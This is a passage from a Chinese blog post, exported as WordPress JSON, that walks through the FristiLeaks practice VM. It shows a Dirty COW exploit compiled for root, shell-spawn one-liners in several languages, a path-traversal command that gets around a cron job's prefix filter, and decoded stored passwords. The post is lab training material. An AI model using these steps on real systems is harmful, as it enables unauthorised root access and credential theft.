\/><\/div><\/p>\n<p>\u5c1d\u8bd5\u4f7f\u7528\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347460.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347460.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240131225339129\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u9047\u5230\u4e86\u4e00\u4e9b\u62a5\u9519\uff0c\u5c1d\u8bd5\u89e3\u51b3\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347461.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347461.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240131225546188\" style=\"zoom: 33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347462.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347462.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240131225613846\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u4fee\u6539\u4e00\u4e0b\u53c2\u6570\u7f16\u8bd1\uff1a<\/p>\n<pre><code class=\"language-shell\">gcc -lpthread -lcrypt 40839.c<\/code><\/pre>\n<p>\u8fd0\u884c\u6210\u529f\uff0c\u83b7\u53d6root\uff01<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347463.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347463.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240131225910889\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<p>\u4f46\u662f\u5c1d\u8bd5<code>su firefart<\/code>\u7684\u65f6\u5019\uff0c\u51fa\u73b0\u4e86\u62a5\u9519<code>standard in must be a tty<\/code>\uff1b\u53c2\u8003\u8fd9\u4f4d\u5e08\u5085\u7684<a href=\"https:\/\/www.cnblogs.com\/sainet\/p\/15783539.html\">blog<\/a><\/p>\n<h4>\u4f7f\u7528 Python \u5347\u7ea7\u5230\u5b8c\u5168\u4ea4\u4e92\u5f0f shell<\/h4>\n<p>\u67e5\u770b\u4e00\u4e0b\u662f\u5426\u6709<code>python2\/python3<\/code>:<\/p>\n<pre><code class=\"language-shell\">python2 -V\nPython 2.6.6\npython3 -V\n\/bin\/bash: line 7: python3: command not found<\/code><\/pre>\n<p>\u5728\u9776\u673a\u4e0a\u8f93\u5165\u4ee5\u4e0b\u547d\u4ee4<\/p>\n<pre><code class=\"language-python\">python2 -c &#039;import pty;pty.spawn(&quot;\/bin\/bash&quot;)&#039;;\n# export TERM = xterm<\/code><\/pre>\n<p>(\u6211\u5230\u8fd9\u5c31\u53ef\u4ee5\u987a\u5229\u89e3\u51b3\u4e86\uff0c\u4e0b\u9762\u7684\u662f\u5e08\u5085\u5199\u7684\uff0c\u8f6c\u8f7d\u4e00\u4e0b\uff0c\u63d0\u9192\u4e00\u4e0b\u81ea\u5df1)<\/p>\n<p>\u63a5\u4e0b\u6765\uff0c\u5728\u9776\u673a\u4e0a\u8f93\u5165\u4ee5\u4e0b\u547d\u4ee4\u6765\u8bbe\u7f6e\u4e00\u4e9b\u91cd\u8981\u7684\u73af\u5883\u53d8\u91cf\uff1a<\/p>\n<pre><code class=\"language-shell\">export SHELL=bash\nexport TERM=xterm-256color #\u5141\u8bb8 clear\uff0c\u5e76\u4e14\u6709\u989c\u8272<\/code><\/pre>\n<p>\u952e\u5165<code>ctrl-z<\/code>\u4ee5\u5c06 shell \u53d1\u9001\u5230\u540e\u53f0\u3002<\/p>\n<p>\u8bbe\u7f6e shell \u4ee5\u901a\u8fc7\u53cd\u5411 shell \u53d1\u9001\u63a7\u5236\u5b57\u7b26\u548c\u5176\u4ed6\u539f\u59cb\u8f93\u5165\u3002\u4f7f\u7528\u4ee5\u4e0bstty\u547d\u4ee4\u6765\u6267\u884c\u6b64\u64cd\u4f5c\uff1a<\/p>\n<pre><code class=\"language-shell\">stty raw -echo;fg<\/code><\/pre>\n<p>\u56de\u8f66\u4e00\u6b21\u540e\u8f93\u5165 reset \u518d\u56de\u8f66\u5c06\u518d\u6b21\u8fdb\u5165 shell \u4e2d\uff0c\u5230\u6b64 TTY shell \u5347\u7ea7\u5b8c\u6210\u3002<\/p>\n<h4>\u5176\u4ed6\u8bed\u8a00\u5199\u5165\u4ea4\u4e92\u5f0f shell\uff1a<\/h4>\n<pre><code class=\"language-shell\">echo os.system(&#039;\/bin\/bash&#039;)\n\/bin\/sh -i\n\n#python3\npython3 -c &#039;import pty; pty.spawn(&quot;\/bin\/sh&quot;)&#039;\n\n#perl\nperl -e &#039;exec &quot;\/bin\/sh&quot;;&#039;\n\n#ruby\nexec &quot;\/bin\/sh&quot;\nruby -e &#039;exec &quot;\/bin\/sh&quot;&#039;\n\n#lua\nlua -e &quot;os.execute(&#039;\/bin\/sh&#039;)&quot;<\/code><\/pre>\n<p>\u7136\u540e\u8f6c\u6362\u7528\u6237\uff0c\u8bfb\u53d6flag\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347464.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347464.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240131231632041\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u4f5c\u8005\u811a\u672c\u63d0\u6743<\/h3>\n<p>\u6211\u770b\u5e08\u5085\u4eec\u7684\u89e3\u51b3\u529e\u6cd5\u6709\u7684\u548c\u6211\u4e0d\u4e00\u6837\uff0c\u5c1d\u8bd5\u8fdb\u884c\u5b9e\u73b0\u4e00\u4e0b\uff1a<\/p>\n<p>\u4e3a\u4e86\u4e0d\u5f71\u54cd\u4e0b\u9762\u7684\u6548\u679c\uff0c\u5148\u5c06\u7ba1\u7406\u5458\u5bc6\u7801\u8bbe\u4e3a\u9ed8\u8ba4\u7684\uff0c\uff08\u518d\u6b21\u8fd0\u884c\u4e00\u4e0b\u90a3\u4e2a\u810f\u725b2\uff09<\/p>\n<p>\u5148\u8fdb\u5165\u4e00\u4e0b\u7528\u6237\u540d\u90a3\u4e2a\u76ee\u5f55\u67e5\u770b\u4e00\u4e0b\u6709\u65e0\u654f\u611f\u4fe1\u606f\uff0c\u53d1\u73b0\u4e00\u4e2a<code>notes.txt<\/code>\uff1a<\/p>\n<pre><code class=\"language-text\">Yo EZ,\n\nI made it possible for you to do some automated checks, \nbut I did only allow you access to \/usr\/bin\/* system binaries. I did\nhowever copy a few extra often needed commands to my \nhomedir: chmod, df, cat, echo, ps, grep, egrep so you can use those\nfrom \/home\/admin\/\n\nDon&#039;t forget to specify the full path for each binary!\n\nJust put a file called &quot;runthis&quot; in \/tmp\/, each line one command. The \noutput goes to the file &quot;cronresult&quot; in \/tmp\/. It should \nrun every minute with my account privileges.\n\n- Jerry<\/code><\/pre>\n<p>\u4f5c\u8005\u8bf4\u8981\u56de\u5230\/tmp\u76ee\u5f55\u5e76\u521b\u5efarunthis\u6587\u4ef6\uff0c\u5c1d\u8bd5\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-shell\">echo &quot;\/usr\/bin\/..\/..\/bin\/chmod -R 777 \/home\/admin&quot; &gt;\/tmp\/runthis<\/code><\/pre>\n<p>\u53d1\u73b0\u521b\u5efa\u597d\u4e86\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347465.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347465.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240131232748575\" style=\"zoom: 67%;\" \/><\/div><\/p>\n<p>\u7136\u540e\u67e5\u770b\u4e00\u4e0b<code>admin<\/code>\u76ee\u5f55\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347466.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347466.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240131232854115\" style=\"zoom:67%;\" \/><\/div><\/p>\n<p>\u53ef\u4ee5\u770b\u5230\u51e0\u4e2a\u7279\u6b8a\u7684\u6587\u4ef6\uff1a<\/p>\n<pre><code class=\"language-python\"># cronjob.py\nimport os\n\ndef writefile(str):\n    with open(&#039;\/tmp\/cronresult&#039;,&#039;a&#039;) as er:\n        er.write(str)\n        er.close()\n\nwith open(&#039;\/tmp\/runthis&#039;,&#039;r&#039;) as f:\n    for line in f:\n        #does the command start with \/home\/admin or \/usr\/bin?\n        if line.startswith(&#039;\/home\/admin\/&#039;) or line.startswith(&#039;\/usr\/bin\/&#039;):\n            #lets check for pipeline\n            checkparams= &#039;|&amp;;&#039;\n            if checkparams in line:\n                writefile(&quot;Sorry, not allowed to use |, &amp; or ;&quot;)\n                exit(1)\n            else:\n                writefile(&quot;executing: &quot;+line)\n                result =os.popen(line).read()\n                writefile(result)\n        else:\n            writefile(&quot;command did not start with \/home\/admin or \/usr\/bin&quot;)\n# \u8fd9\u4e2a\u811a\u672c\u7684\u4e3b\u8981\u529f\u80fd\u662f\u4ece\u6587\u4ef6\/tmp\/runthis\u4e2d\u8bfb\u53d6\u547d\u4ee4\u5e76\u6267\u884c\u5b83\u4eec\uff0c\u4f46\u662f\u6709\u4e00\u4e9b\u9650\u5236\u548c\u8bb0\u5f55\uff1a\n\n# \u6267\u884c\u547d\u4ee4\uff1a\u53ea\u6709\u4ee5\/home\/admin\/\u6216\/usr\/bin\/\u5f00\u5934\u7684\u547d\u4ee4\u624d\u4f1a\u88ab\u6267\u884c\u3002\n# \u7ba1\u9053\u548c\u63a7\u5236\u64cd\u4f5c\u7b26\uff1a\u5982\u679c\u547d\u4ee4\u4e2d\u5305\u542b\u7ba1\u9053(|)\u3001\u540e\u53f0\u6267\u884c(&amp;)\u6216\u547d\u4ee4\u5206\u9694\u7b26(;)\uff0c\u811a\u672c\u4f1a\u62d2\u7edd\u6267\u884c\uff0c\u5e76\u5728\/tmp\/cronresult\u6587\u4ef6\u4e2d\u5199\u5165\u9519\u8bef\u6d88\u606f&quot;Sorry, not allowed to use |, &amp; or ;&quot;\uff0c\u7136\u540e\u9000\u51fa\u3002\n# \u547d\u4ee4\u6267\u884c\u7ed3\u679c\uff1a\u5bf9\u4e8e\u7b26\u5408\u6761\u4ef6\u7684\u547d\u4ee4\uff0c\u811a\u672c\u4f1a\u5728\/tmp\/cronresult\u6587\u4ef6\u4e2d\u8bb0\u5f55&quot;executing: &quot;\u52a0\u4e0a\u547d\u4ee4\u884c\uff0c\u7136\u540e\u6267\u884c\u547d\u4ee4\u5e76\u5c06\u7ed3\u679c\u4e5f\u5199\u5165\/tmp\/cronresult\u6587\u4ef6\u3002\n# \u975e\u6cd5\u547d\u4ee4\uff1a\u5bf9\u4e8e\u4e0d\u7b26\u5408\u6761\u4ef6\u7684\u547d\u4ee4\uff0c\u811a\u672c\u4f1a\u5728\/tmp\/cronresult\u6587\u4ef6\u4e2d\u8bb0\u5f55&quot;command did not start with \/home\/admin or \/usr\/bin&quot;\u3002\n\n# cryptedpass.txt\nmVGZ3O3omkJLmy2pcuTq\n\n# cryptpass.py\n#Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn\nimport base64,codecs,sys\n\ndef encodeString(str):\n    base64string= base64.b64encode(str)\n    return codecs.encode(base64string[::-1], &#039;rot13&#039;)\n\ncryptoResult=encodeString(sys.argv[1])\nprint cryptoResult\n# \u5de5\u4f5c\u6d41\u7a0b\u5982\u4e0b\uff1a\n# Base64\u7f16\u7801\uff1a\u9996\u5148\uff0c\u811a\u672c\u4f1a\u5bf9\u8f93\u5165\u7684\u5b57\u7b26\u4e32\u8fdb\u884cBase64\u7f16\u7801\u3002Base64\u662f\u4e00\u79cd\u5e38\u7528\u7684\u4e8c\u8fdb\u5236\u5230\u6587\u672c\u7684\u7f16\u7801\u65b9\u6848\uff0c\u5b83\u53ef\u4ee5\u5c06\u4e8c\u8fdb\u5236\u6570\u636e\u8f6c\u6362\u4e3a\u753164\u79cd\u53ef\u6253\u5370\u5b57\u7b26\u7ec4\u6210\u7684\u6587\u672c\u5b57\u7b26\u4e32\u3002\n# \u5b57\u7b26\u4e32\u53cd\u8f6c\uff1a\u7136\u540e\uff0c\u811a\u672c\u4f1a\u5c06Base64\u7f16\u7801\u540e\u7684\u5b57\u7b26\u4e32\u53cd\u8f6c\uff0c\u5373\u5c06\u5b57\u7b26\u4e32\u7684\u7b2c\u4e00\u4e2a\u5b57\u7b26\u548c\u6700\u540e\u4e00\u4e2a\u5b57\u7b26\u4ea4\u6362\uff0c\u7b2c\u4e8c\u4e2a\u5b57\u7b26\u548c\u5012\u6570\u7b2c\u4e8c\u4e2a\u5b57\u7b26\u4ea4\u6362\uff0c\u4ee5\u6b64\u7c7b\u63a8\u3002\n# ROT13\u52a0\u5bc6\uff1a\u6700\u540e\uff0c\u811a\u672c\u4f1a\u5bf9\u53cd\u8f6c\u540e\u7684\u5b57\u7b26\u4e32\u8fdb\u884cROT13\u52a0\u5bc6\u3002ROT13\u662f\u4e00\u79cd\u7b80\u5355\u7684\u5b57\u6bcd\u66ff\u6362\u52a0\u5bc6\u65b9\u6cd5\uff0c\u5b83\u5c06\u6bcf\u4e2a\u5b57\u6bcd\u66ff\u6362\u4e3a\u5b57\u6bcd\u8868\u4e2d\u7684\u7b2c13\u4e2a\u5b57\u6bcd\u3002\u4f8b\u5982\uff0c\u2018a\u2019\u4f1a\u88ab\u66ff\u6362\u4e3a\u2019n\u2019\uff0c\u2018n\u2019\u4f1a\u88ab\u66ff\u6362\u4e3a\u2019a\u2019\uff0c\u2018b\u2019\u4f1a\u88ab\u66ff\u6362\u4e3a\u2019o\u2019\uff0c\u4ee5\u6b64\u7c7b\u63a8\u3002\n\n# whoisyourgodnow.txt\n=RFn0AKnlMHMPIzpyuTI0ITG<\/code><\/pre>\n<p>\u8fd9\u91cc\u5927\u6982\u662f\u5bf9\u5bc6\u7801\u8fdb\u884c\u4e86\u52a0\u5bc6\uff0c\u5c1d\u8bd5\u89e3\u5bc6\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-python\">import base64, codecs, sys\n\ndef decodeString(str):\n    rot13string = codecs.decode(str, &#039;rot13&#039;)\n    reversedString = rot13string[::-1]\n    return base64.b64decode(reversedString)\n\ncryptoResult = decodeString(&quot;mVGZ3O3omkJLmy2pcuTq&quot;)\nprint(cryptoResult)\n# LetThereBeFristi!\n# \u540c\u7406\u53e6\u4e00\u4e2a\u662fthisisalsopw123<\/code><\/pre>\n<p>\u5c1d\u8bd5\u767b\u5f55<code>firefart<\/code>\uff0c\u62a5\u9519<code>standard in must be a tty<\/code>\uff0cpython \u6253\u5f00\u4e00\u4e2a\u6807\u51c6\u7684 shell\uff1a<\/p>\n<pre><code class=\"language-python\">python -c &#039;import pty;pty.spawn(&quot;\/bin\/bash&quot;)&#039;<\/code><\/pre>\n<p>\u83b7\u5f97root\u6743\u9650\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347467.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347467.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240131234628053\" style=\"zoom:67%;\" \/><\/div><\/p>\n<p>\u81ea\u6b64\uff0c\u5b8c\u6210\u9776\u573a\u7ec3\u4e60\uff01<\/p>\n","protected":false},"excerpt":{"rendered":"<p>FristiLeaks \u7ec8\u4e8e\u5f00\u59cb\u6362\u9776\u573a\u4e86\uff01 \u73af\u5883\u914d\u7f6e \u4e0b\u8f7d\u4e0b\u6765\u662f\u4e00\u4e2a.ova\u6587\u4ef6\uff0c\u4ee5\u9632bug\uff0c\u91c7\u7528virtua [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24],"tags":[],"class_list":["post-334","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/334","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=334"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/334\/revisions"}],"predecessor-version":[{"id":335,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/334\/revisions\/335"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=334"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=334"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=334"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}